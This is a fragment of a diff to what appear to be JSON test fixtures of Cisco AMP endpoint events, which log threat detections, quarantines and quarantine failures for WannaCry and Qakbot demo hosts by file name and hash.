Quarantined","event_type_id":553648143,"detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239050946806000,"timestamp":1610637528,"timestamp_nanoseconds":587000000,"date":"2021-01-14T15:18:48+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":648000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":414000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
\ No newline at end of file
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":96000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":862000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":659000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":831000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":706000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":643000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":721000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}}
